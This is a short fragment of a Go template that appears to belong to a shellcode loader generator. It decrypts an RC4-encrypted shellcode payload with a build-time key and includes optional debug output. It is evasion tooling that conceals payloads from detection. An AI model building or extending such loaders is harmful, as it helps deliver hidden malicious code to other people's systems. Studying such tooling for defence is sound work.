{{if .Debug}}
printDebug("info","Decrypt RC4 payload data")
{{end}}
shellcode, errRc4 := decryptRc4Data(shellcode, "{{.Key}}")

if errRc4 != nil {
	{{if .Debug}}
	printDebug("error","RC4 decrypt function error: %s", errRc4)
	{{end}}
	return
}